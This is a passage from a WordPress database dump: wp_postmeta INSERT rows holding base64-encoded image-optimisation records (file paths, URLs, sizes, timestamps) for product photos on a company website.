ImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjBsLXByZWNpc2lvbi1jbGVhbmluZy1zb2x2ZW50LTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxMzksInRpbWUiOjE0ODM1NzEyMjQsImlkIjoxNDEwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzIwbC1wcmVjaXNpb24tY2xlYW5pbmctc29sdmVudC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyMGwtcHJlY2lzaW9uLWNsZWFuaW5nLXNvbHZlbnQtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy03MjBsLXByZWNpc2lvbi1jbGVhbmluZy1zb2x2ZW50LTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMjI3LCJpZCI6MTQxMH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTcyMGwtcHJlY2lzaW9uLWNsZWFuaW5nLXNvbHZlbnQtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjBsLXByZWNpc2lvbi1jbGVhbmluZy1zb2x2ZW50LTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNzIwbC1wcmVjaXNpb24tY2xlYW5pbmctc29sdmVudC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTIyOSwiaWQiOjE0MTB9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy03MjBsLXByZWNpc2lvbi1jbGVhbmluZy1zb2x2ZW50LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNzIwbC1wcmVjaXNpb24tY2xlYW5pbmctc29sdmVudC00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTcyMGwtcHJlY2lzaW9uLWNsZWFuaW5nLXNvbHZlbnQtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEyMzIsImlkIjoxNDEwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29525, 1409, 'wpfc_optimisation_reduction', '2379528'); 
INSERT INTO `wp_postmeta` VALUES (29526, 1409, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMzc5NDUzLCJ0aW1lIjoxNDgzNTcxMjQzLCJpZCI6IjE0MDkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTI0NiwiaWQiOjE0MDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMjQ5LCJpZCI6MTQwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEyNTIsImlkIjoxNDA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMjU2LCJpZCI6MTQwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEyNTgsImlkIjoxNDA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTI2MSwiaWQiOjE0MDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMjY0LCJpZCI6MTQwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEyNjcsImlkIjoxNDA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo2MiwidGltZSI6MTQ4MzU3MTI2OSwiaWQiOjE0MDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEyNzIsImlkIjoxNDA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMjc0LCJpZCI6MTQwOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3N2MtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTI3NywiaWQiOjE0MDl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzdjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEyODAsImlkIjoxNDA5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc3Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMjgyLCJpZCI6MTQwOX1d'); 
INSERT INTO `wp_postmeta` VALUES (29527, 1408, 'wpfc_optimisation_reduction', '2074530'); 
INSERT INTO `wp_postmeta` VALUES (29528, 1408, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmcuanBnIiwicmVkdWN0aW9uIjoyMDc0MDY0LCJ0aW1lIjoxNDgzNTcxMjkzLCJpZCI6IjE0MDgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MTI5NiwiaWQiOjE0MDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo1MzMsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbXMtNDc1Yy1hY3J5bGljLWNvbmZvcm1hbC1jb2F0aW5nLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMjk5LCJpZCI6MTQwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzEzMDIsImlkIjoxNDA4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21zLTQ3NWMtYWNyeWxpYy1jb25mb3JtYWwtY29hdGluZy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcxMzA1LCJpZCI6MTQwOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tcy00NzVjLWFjcnlsaWMtY29uZm9ybWFsLWNvYXRpbmctMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFn